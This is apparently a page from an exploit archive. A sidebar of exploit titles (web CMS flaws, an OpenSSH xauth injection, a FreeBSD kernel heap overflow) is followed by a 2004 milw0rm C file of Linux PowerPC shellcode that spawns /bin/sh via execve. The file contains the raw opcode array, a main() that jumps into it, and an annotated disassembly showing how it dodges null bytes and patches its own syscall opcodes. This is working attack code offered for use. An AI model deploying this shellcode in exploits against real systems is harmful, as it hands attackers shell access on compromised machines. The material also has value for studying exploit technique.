477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
70 lines
No EOL
2.1 KiB
C
Executable file
70 lines
No EOL
2.1 KiB
C
Executable file
/*
|
|
* Linux PPC shellcode
|
|
* execve() of /bin/sh by Palante
|
|
*/
|
|
|
|
long shellcode[] = { /* Palante's linuxPPC shellcode w/ NULL*/
|
|
0x7CC63278, 0x2F867FFF, 0x41BC0054, 0x7C6802A6,
|
|
0xB0C3FFF9, 0xB0C3FFF1, 0x38867FF0, 0x38A67FF4,
|
|
0x38E67FF3, 0x7CA52278, 0x7CE72278, 0x7C853A14,
|
|
0x7CC419AE, 0x7C042A14, 0x7CE72850, 0x7C852A14,
|
|
0x7C63212E, 0x7C832214, 0x7CC5212E, 0x7CA52A78,
|
|
0x44FFFF02, 0x7CE03B78, 0x44FFFF02, 0x4BFFFFB1,
|
|
0x2F62696E, 0x2F73685A, 0xFFFFFFFF, 0xFFFFFFFF
|
|
};
|
|
|
|
|
|
void main()
|
|
{
|
|
__asm__("b shellcode");
|
|
}
|
|
|
|
/* disassembly
|
|
|
|
.section ".text" # Palante's LinuxPPC shellcode
|
|
.align 2
|
|
.globl m
|
|
.type m,@function
|
|
m:
|
|
xor 6,6,6 # r6 is 0
|
|
cmpi 7,0,6,0x7FFF # do meaningless compare
|
|
bc 13,28,L2 # conditional branch to L2 - CAUSES NULL BYTE
|
|
L1: mfspr 3,8 # address of /bin/sh into r3 (execve parameter)
|
|
|
|
sth 6,-7(3) # fix sc opcode
|
|
sth 6,-15(3) # fix sc opcode
|
|
|
|
addi 4,6,0x7FF0
|
|
addi 5,6,0x7FF4
|
|
addi 7,6,0x7FF3
|
|
xor 5,5,4 #got 0x4 into r5
|
|
xor 7,7,4 #got 0x3 into r7
|
|
|
|
|
|
add 4,5,7 # r4 = 0x7
|
|
stbx 6,4,3 # store null after /bin/sh
|
|
|
|
add 0,4,5 # this makes 11 which is the execve system call
|
|
sub 7,5,7 # r7 = 0x1 for exit system call
|
|
|
|
add 4,5,5 # r4 = 0x8
|
|
stwx 3,3,4 # and store pointer to /bin/sh at r3+0x8
|
|
add 4,3,4 # r4 = r3 + 0x8 (execve parameter)
|
|
stwx 6,5,4 # store NULL pointer
|
|
xor 5,5,5 # NULL (execve parameter)
|
|
.long 0x44ffff02 # not quite an sc opcode
|
|
or 0,7,7 # syscall 1 - exit
|
|
.long 0x44ffff02 # not quite an sc opcode
|
|
|
|
L2: bl L1 # branch and link back to L1
|
|
.long 0x2F62696E #/bin/shZ
|
|
.long 0x2F73685A
|
|
.long 0xffffffff # this is where pointer to /bin/sh goes
|
|
.long 0xffffffff # this is where null pointer goes
|
|
|
|
.Lfe1:
|
|
.size m,.Lfe1-m
|
|
|
|
*/
|
|
|
|
// milw0rm.com [2004-09-12]
|